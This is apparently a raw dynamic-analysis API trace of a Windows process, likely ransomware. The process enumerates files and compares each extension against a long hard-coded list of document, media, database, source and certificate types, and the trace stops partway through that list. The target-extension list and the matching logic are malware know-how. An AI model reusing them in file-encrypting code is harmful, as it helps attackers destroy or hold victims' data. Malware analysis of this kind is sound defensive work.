lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.710] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.710] lstrlenW (lpString=".1cd") returned 4 [0284.710] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.710] lstrlenW (lpString=".3ds") returned 4 [0284.711] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0284.711] lstrlenW (lpString=".3fr") returned 4 [0284.711] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0284.711] lstrlenW (lpString=".3g2") returned 4 [0284.711] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0284.711] lstrlenW (lpString=".3gp") returned 4 [0284.711] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0284.711] lstrlenW (lpString=".7z") returned 3 [0284.711] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.711] lstrlenW (lpString=".accda") returned 6 [0284.711] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0284.711] lstrlenW (lpString=".accdb") returned 6 [0284.711] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0284.711] lstrlenW (lpString=".accdc") returned 6 [0284.711] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0284.711] lstrlenW (lpString=".accde") returned 6 [0284.711] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0284.711] lstrlenW (lpString=".accdt") returned 6 [0284.711] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0284.711] lstrlenW (lpString=".accdw") returned 6 [0284.711] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0284.711] lstrlenW (lpString=".adb") returned 4 [0284.711] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0284.711] lstrlenW (lpString=".adp") returned 4 [0284.711] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0284.711] lstrlenW (lpString=".ai") returned 3 [0284.711] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0284.711] lstrlenW (lpString=".ai3") returned 4 [0284.712] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".ai4") returned 4 [0284.712] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".ai5") returned 4 [0284.712] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".ai6") returned 4 [0284.712] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".ai7") returned 4 [0284.712] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".ai8") returned 4 [0284.712] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".anim") returned 5 [0284.712] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0284.712] lstrlenW (lpString=".arw") returned 4 [0284.712] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".as") returned 3 [0284.712] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0284.712] lstrlenW (lpString=".asa") returned 4 [0284.712] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".asc") returned 4 [0284.712] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".ascx") returned 5 [0284.712] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0284.712] lstrlenW (lpString=".asm") returned 4 [0284.712] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0284.712] lstrlenW (lpString=".asmx") returned 5 [0284.712] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0284.712] lstrlenW (lpString=".asp") returned 4 [0284.712] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".aspx") returned 5 [0284.713] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0284.713] lstrlenW (lpString=".asr") returned 4 [0284.713] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".asx") returned 4 [0284.713] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".avi") returned 4 [0284.713] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".avs") returned 4 [0284.713] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".backup") returned 7 [0284.713] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0284.713] lstrlenW (lpString=".bak") returned 4 [0284.713] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".bay") returned 4 [0284.713] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".bd") returned 3 [0284.713] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0284.713] lstrlenW (lpString=".bin") returned 4 [0284.713] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".bmp") returned 4 [0284.713] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".bz2") returned 4 [0284.713] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".c") returned 2 [0284.713] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0284.713] lstrlenW (lpString=".cdr") returned 4 [0284.713] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0284.713] lstrlenW (lpString=".cer") returned 4 [0284.714] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".cf") returned 3 [0284.714] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0284.714] lstrlenW (lpString=".cfc") returned 4 [0284.714] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".cfm") returned 4 [0284.714] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".cfml") returned 5 [0284.714] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0284.714] lstrlenW (lpString=".cfu") returned 4 [0284.714] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".chm") returned 4 [0284.714] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".cin") returned 4 [0284.714] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".class") returned 6 [0284.714] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0284.714] lstrlenW (lpString=".clx") returned 4 [0284.714] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".config") returned 7 [0284.714] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0284.714] lstrlenW (lpString=".cpp") returned 4 [0284.714] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".cr2") returned 4 [0284.714] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0284.714] lstrlenW (lpString=".crt") returned 4 [0284.714] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".crw") returned 4 [0284.715] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".cs") returned 3 [0284.715] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0284.715] lstrlenW (lpString=".css") returned 4 [0284.715] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".csv") returned 4 [0284.715] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".cub") returned 4 [0284.715] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".dae") returned 4 [0284.715] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".dat") returned 4 [0284.715] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".db") returned 3 [0284.715] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0284.715] lstrlenW (lpString=".dbf") returned 4 [0284.715] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".dbx") returned 4 [0284.715] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".dc3") returned 4 [0284.715] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".dcm") returned 4 [0284.715] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".dcr") returned 4 [0284.715] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0284.715] lstrlenW (lpString=".der") returned 4 [0284.716] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".dib") returned 4 [0284.716] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".dic") returned 4 [0284.716] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".dif") returned 4 [0284.716] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".divx") returned 5 [0284.716] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0284.716] lstrlenW (lpString=".djvu") returned 5 [0284.716] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0284.716] lstrlenW (lpString=".dng") returned 4 [0284.716] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".doc") returned 4 [0284.716] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".docm") returned 5 [0284.716] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0284.716] lstrlenW (lpString=".docx") returned 5 [0284.716] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.716] lstrlenW (lpString=".dot") returned 4 [0284.716] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0284.716] lstrlenW (lpString=".dotm") returned 5 [0284.716] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0284.716] lstrlenW (lpString=".dotx") returned 5 [0284.716] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0284.716] lstrlenW (lpString=".dpx") returned 4 [0284.716] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".dqy") returned 4 [0284.717] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".dsn") returned 4 [0284.717] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".dt") returned 3 [0284.717] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0284.717] lstrlenW (lpString=".dtd") returned 4 [0284.717] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".dwg") returned 4 [0284.717] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".dwt") returned 4 [0284.717] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".dx") returned 3 [0284.717] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0284.717] lstrlenW (lpString=".dxf") returned 4 [0284.717] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".edml") returned 5 [0284.717] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0284.717] lstrlenW (lpString=".efd") returned 4 [0284.717] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".elf") returned 4 [0284.717] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".emf") returned 4 [0284.717] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".emz") returned 4 [0284.717] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0284.717] lstrlenW (lpString=".epf") returned 4 [0284.718] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".eps") returned 4 [0284.718] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".epsf") returned 5 [0284.718] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0284.718] lstrlenW (lpString=".epsp") returned 5 [0284.718] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0284.718] lstrlenW (lpString=".erf") returned 4 [0284.718] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".exr") returned 4 [0284.718] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".f4v") returned 4 [0284.718] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".fido") returned 5 [0284.718] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0284.718] lstrlenW (lpString=".flm") returned 4 [0284.718] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".flv") returned 4 [0284.718] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".frm") returned 4 [0284.718] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".fxg") returned 4 [0284.718] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".geo") returned 4 [0284.718] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0284.718] lstrlenW (lpString=".gif") returned 4 [0284.718] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".grs") returned 4 [0284.719] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".gz") returned 3 [0284.719] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0284.719] lstrlenW (lpString=".h") returned 2 [0284.719] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0284.719] lstrlenW (lpString=".hdr") returned 4 [0284.719] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".hpp") returned 4 [0284.719] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".hta") returned 4 [0284.719] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".htc") returned 4 [0284.719] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".htm") returned 4 [0284.719] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".html") returned 5 [0284.719] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0284.719] lstrlenW (lpString=".icb") returned 4 [0284.719] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".ics") returned 4 [0284.719] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0284.719] lstrlenW (lpString=".iff") returned 4 [0284.719] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".inc") returned 4 [0284.720] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".indd") returned 5 [0284.720] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0284.720] lstrlenW (lpString=".ini") returned 4 [0284.720] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".iqy") returned 4 [0284.720] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".j2c") returned 4 [0284.720] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".j2k") returned 4 [0284.720] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".java") returned 5 [0284.720] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0284.720] lstrlenW (lpString=".jp2") returned 4 [0284.720] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".jpc") returned 4 [0284.720] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".jpe") returned 4 [0284.720] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0284.720] lstrlenW (lpString=".jpeg") returned 5 [0284.720] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0284.720] lstrlenW (lpString=".jpf") returned 4 [0284.721] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".jpg") returned 4 [0284.721] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".jpx") returned 4 [0284.721] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".js") returned 3 [0284.721] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0284.721] lstrlenW (lpString=".jsf") returned 4 [0284.721] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".json") returned 5 [0284.721] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0284.721] lstrlenW (lpString=".jsp") returned 4 [0284.721] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".kdc") returned 4 [0284.721] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".kmz") returned 4 [0284.721] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".kwm") returned 4 [0284.721] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0284.721] lstrlenW (lpString=".lasso") returned 6 [0284.722] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0284.722] lstrlenW (lpString=".lbi") returned 4 [0284.722] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".lgf") returned 4 [0284.722] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".lgp") returned 4 [0284.722] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".log") returned 4 [0284.722] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".m1v") returned 4 [0284.722] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".m4a") returned 4 [0284.722] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".m4v") returned 4 [0284.722] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".max") returned 4 [0284.722] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".md") returned 3 [0284.722] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0284.722] lstrlenW (lpString=".mda") returned 4 [0284.722] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".mdb") returned 4 [0284.722] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0284.722] lstrlenW (lpString=".mde") returned 4 [0284.722] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mdf") returned 4 [0284.723] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mdw") returned 4 [0284.723] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mef") returned 4 [0284.723] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mft") returned 4 [0284.723] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mfw") returned 4 [0284.723] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mht") returned 4 [0284.723] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mhtml") returned 6 [0284.723] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0284.723] lstrlenW (lpString=".mka") returned 4 [0284.723] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mkidx") returned 6 [0284.723] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0284.723] lstrlenW (lpString=".mkv") returned 4 [0284.723] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mos") returned 4 [0284.723] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mov") returned 4 [0284.723] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0284.723] lstrlenW (lpString=".mp3") returned 4 [0284.723] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0284.724] lstrlenW (lpString=".mp4") returned 4 [0284.724] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0284.724] lstrlenW (lpString=".mpeg") returned 5 [0284.724] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0284.724] lstrlenW (lpString=".mpg") returned 4 [0284.724] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0284.724] lstrlenW (lpString=".mpv") returned 4 [0284.724] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0284.724] lstrlenW (lpString=".mrw") returned 4 [0284.724] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0284.724] lstrlenW (lpString=".msg") returned 4 [0284.724] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0284.724] lstrlenW (lpString=".mxl") returned 4 [0284.724] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0284.724] lstrlenW (lpString=".myd") returned 4 [0284.724] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0284.724] lstrlenW (lpString=".myi") returned 4 [0284.724] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0284.724] lstrlenW (lpString=".nef") returned 4 [0284.724] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0284.724] lstrlenW (lpString=".nrw") returned 4 [0284.724] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0284.724] lstrlenW (lpString=".obj") returned 4 [0284.724] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0284.724] lstrlenW (lpString=".odb") returned 4 [0284.724] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0284.725] lstrlenW (lpString=".odc") returned 4 [0284.725] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0284.725] lstrlenW (lpString=".odm") returned 4 [0284.725] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0284.725] lstrlenW (lpString=".odp") returned 4 [0284.725] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0284.725] lstrlenW (lpString=".ods") returned 4 [0284.895] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0284.895] lstrlenW (lpString=".oft") returned 4 [0284.895] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".one") returned 4 [0284.896] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".onepkg") returned 7 [0284.896] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0284.896] lstrlenW (lpString=".onetoc2") returned 8 [0284.896] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0284.896] lstrlenW (lpString=".opt") returned 4 [0284.896] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".oqy") returned 4 [0284.896] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".orf") returned 4 [0284.896] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".p12") returned 4 [0284.896] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".p7b") returned 4 [0284.896] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".p7c") returned 4 [0284.896] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".pam") returned 4 [0284.896] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".pbm") returned 4 [0284.896] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0284.896] lstrlenW (lpString=".pct") returned 4 [0284.896] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pcx") returned 4 [0284.897] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pdd") returned 4 [0284.897] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pdf") returned 4 [0284.897] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pdp") returned 4 [0284.897] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pef") returned 4 [0284.897] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pem") returned 4 [0284.897] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pff") returned 4 [0284.897] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pfm") returned 4 [0284.897] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pfx") returned 4 [0284.897] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".pgm") returned 4 [0284.897] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0284.897] lstrlenW (lpString=".php") returned 4 [0284.897] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0284.898] lstrlenW (lpString=".php3") returned 5 [0284.898] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0284.898] lstrlenW (lpString=".php4") returned 5 [0284.898] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0284.898] lstrlenW (lpString=".php5") returned 5 [0284.898] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0284.898] lstrlenW (lpString=".phtml") returned 6 [0284.898] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0284.898] lstrlenW (lpString=".pict") returned 5 [0284.898] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0284.898] lstrlenW (lpString=".pl") returned 3 [0284.898] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0284.898] lstrlenW (lpString=".pls") returned 4 [0284.898] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0284.898] lstrlenW (lpString=".pm") returned 3 [0284.898] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0284.898] lstrlenW (lpString=".png") returned 4 [0284.898] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0284.898] lstrlenW (lpString=".pnm") returned 4 [0284.898] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0284.898] lstrlenW (lpString=".pot") returned 4 [0284.898] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0284.898] lstrlenW (lpString=".potm") returned 5 [0284.898] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0284.898] lstrlenW (lpString=".potx") returned 5 [0284.898] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0284.898] lstrlenW (lpString=".ppa") returned 4 [0284.899] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 